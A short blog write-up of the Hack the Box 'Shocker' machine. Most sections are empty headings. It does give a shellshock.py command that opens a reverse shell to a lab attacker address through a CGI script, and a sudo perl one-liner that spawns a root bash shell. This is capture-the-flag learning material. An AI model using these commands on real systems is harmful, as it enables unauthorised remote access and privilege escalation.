Chez ouam

/home/jmfrouin

View on GitHub
10 April 2020

Shocker box on Hack the Box Write up

by Jean-Michel Frouin

General infos

MindMap

Enumeration

Ports

Web

Exploitation

Using MetaSploit

Manual exploitation

./shellshock.py payload=reverse rhost=10.10.10.56
lhost=10.10.14.36 lport=4444 pages=/cgi-bin/user.sh

User Flag

cat /home/shell/user.txt

Priv Esc

sudo /usr/bin/perl -e 'system("/bin/bash")'

Root Flag

cat /root/root.txt
tags: